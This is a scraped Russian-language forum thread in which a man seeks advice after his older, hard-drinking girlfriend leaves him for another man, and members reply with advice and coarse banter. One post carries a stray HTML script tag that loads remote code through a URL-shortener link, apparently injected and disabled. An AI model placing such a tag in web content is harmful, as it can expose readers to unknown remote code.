Top.Mail.Ru

Перейти к содержимому

Фотография

девушка ушла к другому

• Авторизуйтесь для ответа в теме
Сообщений в теме: 102

#46 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 14:38

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

когда я не работал она свои пьянки обьясняла тем что не работаю

Где здесь взаимосвязь-то? С таким де успезом можно утверждать, что ее пьянки вызваны вспышками солнечной активности, Или антициклоном из Атлантики.

36. Девушка, а кто она мальчик по твоему? ))

Это уже давно не девушка. Некоторые и РСП "девушками" называют.

Представь себя в свои 36 с бабой 36+13=49 лет от роду. Даже, если она и не бузает. Ее ведь еще и трахать надо, хотя бы иногда. Тебе не поплохело?

можно просто закрыть на это глаза,хоть и мои родные признавали что это почти нереально ввиду ее косяков

я просто не знаю как быть,хахаль ее запретил походу со мной общаться ей,я сам не звоню не пишу чтобы душа не болела,может у них 1 косяк случится и она одумается?с другой стороны то что они оба пьющие это х-во. ждать надо долго

• 0

#47 Iraq

Iraq

Советчик

• Полноправный
  • PipPipPip
  • 1 306 Cообщений
1 640
Очень хороший

Отправлено 28 мая 2017 - 14:38

Тема конечно треш.

Автор, благодари судьбу что она сама от тебя ушла, а то ты такой что и женился и детей на строгал бы с ней.

• 7

#48 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:46

Ну да, если девушка закладывает за воротник, то очень много пришлось бы потратить нервов, да и вряд-ли получилось бы - сколько волка не корми, а он все равно в лес смотрит.

Сообщение отредактировал Mixrud: 28 мая 2017 - 14:47

• 0

#49 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 14:49

Тема конечно треш.

Автор, благодари судьбу что она сама от тебя ушла, а то ты такой что и женился и детей на строгал бы с ней.

у нее по женски болезнь,она не может рожать,хотя новый хахаль говорит что у нее ребенок от него==

Ну да, если девушка закладывает за воротник, то очень много пришлось бы потратить нервов, да и вряд-ли получилось бы - сколько волка не корми, а он все равно в лес смотрит.

вот и думай кому больше повезло,ему или мне)

• 0

#50 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:50

Ну значит пролечились. Бывает в молодости гонокококк или ещё какие инфекции требующие учёта в КВД. И бывает часто что потом девушка не может родить. Но если пролечиться долго у гинеколога, то вполне и реально забеременеть.
  • 0

#51 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 14:52

Ну значит пролечились. Бывает в молодости гонокококк или ещё какие инфекции требующие учёта в КВД. И бывает часто что потом девушка не может родить. Но если пролечиться долго у гинеколога, то вполне и реально забеременеть.

все может быть,но любить одного а жить с другим это либо пустые слова с намеком на *аэродром* либо болезненная правда ввиду моей несостоятельности дать ей ее потребности

• 0

#52 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:54

Я думаю все очевидно. Все было расписано на первой странице. А мы уже поехали на четвертую.

Сообщение отредактировал Mixrud: 28 мая 2017 - 14:57

• 0

#53 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 14:57

Я думаю все очевидно. Все было расписано на первой странице.

это я понял))))))))))а она может вернуться по твоему?и  насколько долго с ним будет?чисто твое мнение

• 0

#54 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 15:02

Пока он ей даёт то важное для нее - тусовки, совместное распитие спиртных напитков, то конечно же нет. Но жизнь сложная штука и она может внести свои коррективы. При каких-то раскладах она может вернуться к тебе, но это должны быть очень серьёзные коррективы, когда она сама будет вынуждена наступить на горло собственной песне, то есть согласиться зашиться и быть с тобой. Маловероятно все это.
  • 0

#55 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 15:06

Пока он ей даёт то важное для нее - тусовки, совместное распитие спиртных напитков, то конечно же нет. Но жизнь сложная штука и она может внести свои коррективы. При каких-то раскладах она может вернуться к тебе, но это должны быть очень серьёзные коррективы, когда она сама будет вынуждена наступить на горло собственной песне, то есть согласиться зашиться и быть с тобой. Маловероятно все это.

хоть что то радует,но не ждать же ее все это время и надеяться,надо заняться собой))))))))))))еще до того как она забрала вещи я нашел другую девушку,погулял с ней,а бывшая это видела,она не в восторге была. хотя спустя месяцы может и остыть ко мне и привязаться к нему но это так, с девчонками гулять и мутить никто не запрещает)

• 0

#56 Давинче

Давинче

бывалый

• Полноправный
  • PipPip
  • 352 Cообщений
262
Очень хороший

Отправлено 28 мая 2017 - 15:12

На вкус и цвет товарищей нет. Для меня все дамы младше 35 что-то вроде ясельной подготовительной группы. Дело не в возрасте дамы. И с возрастом дама не становится хуже. Вы ещё введите градации по первой и второй свежести :)))

Дело не в возрасте,а в разнице возрастов.Ему 40 будет,ей за 50 и она не всю жизнь будет выглядеть на 30, а тем более с её пристрастием.
  • 0

#57 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 15:22

Ну как-то мы ищем для жизни человека, а не смазливую девушку :)) А иначе зачем нам ЛТР, можно обойтись и секс-онли. ЛТР основанный только на смазливости девушки, не основанный на дружеских чувствах, симпатиях, увлечениях, когда нам нравится как говорит девушка, как думает, то есть не является вполне родной это неправильный ЛТР. В таком случае вполне можно обойтись секс-онли.

Как я понял автора единственная проблема - его женщина бухает. А так она вполне его человек для совместной жизни.
  • 0

#58 Давинче

Давинче

бывалый

• Полноправный
  • PipPip
  • 352 Cообщений
262
Очень хороший

Отправлено 28 мая 2017 - 15:40

Автор,покажи свою леди в личку,жуть как интересно на ком можно залипнуть с такой разницей в возрасте.Я с Алматы,так что узнать ее как знакомую шансов минимум.

Как я понял автора единственная проблема - его женщина бухает. А так она вполне его человек для совместной жизни.

Нихрена себе "единственная" проблема....А то что она живет и сношается с другим мужиком уже не проблема?И что переодически не приходила домой ночевать тоже далеко не проблема?Страные понятия о проблемах у молодежи.Куколд рулез.
  • 1

#59 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 16:21

Автор,покажи свою леди в личку,жуть как интересно на ком можно залипнуть с такой разницей в возрасте.Я с Алматы,так что узнать ее как знакомую шансов минимум.

Нихрена себе "единственная" проблема....А то что она живет и сношается с другим мужиком уже не проблема?И что переодически не приходила домой ночевать тоже далеко не проблема?Страные понятия о проблемах у молодежи.Куколд рулез.

вот именно что живет, а еще при всех называет его любимым ,хвастается им и его крутостью,что не бьет и выпивают вместе,моя мать я и некоторые другие это лишь немногие кому она сказала о чувствах ко мне

• 0

#60 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 16:35

Ну ты конечно молодец, способ воспитания женщины выбрал отличающийся оригинальностью :)
Только женщина с заниженной самооценкой и психологическими проблемами не пошлет такого мужика сразу же. Сразу же. Такое воспитание недопустимо.
Тебе нужно было переключать внимание женщины на другие интересы - просмотр фильмов, новости кино, поездки в областной город, например в Макдональдс или KFC. Посещение театров там, кинотеатров, парки, велики, Фейсбук, инстаграммы и так далее. Ну у тебя не хватит ресурсов увлечь ее другой жизнью.

Все это может сработать в теории, однако упирается в ограниченность материальных ресурсов. Поэтому вытащить этим женщину больную алкоголизмом скорее не получится. Как в фильме "Красотка" на такую даму нужен миллионер :))
Тогда получится показать другую жизнь, другие интересы, другие перспективы и другие источники откуда можно черпать счастье. И у нее получится научиться получать счастье не только из баттла со стольной 0.7 :)

Сообщение отредактировал Mixrud: 28 мая 2017 - 16:39

• 0

Количество пользователей, читающих эту тему: 1

0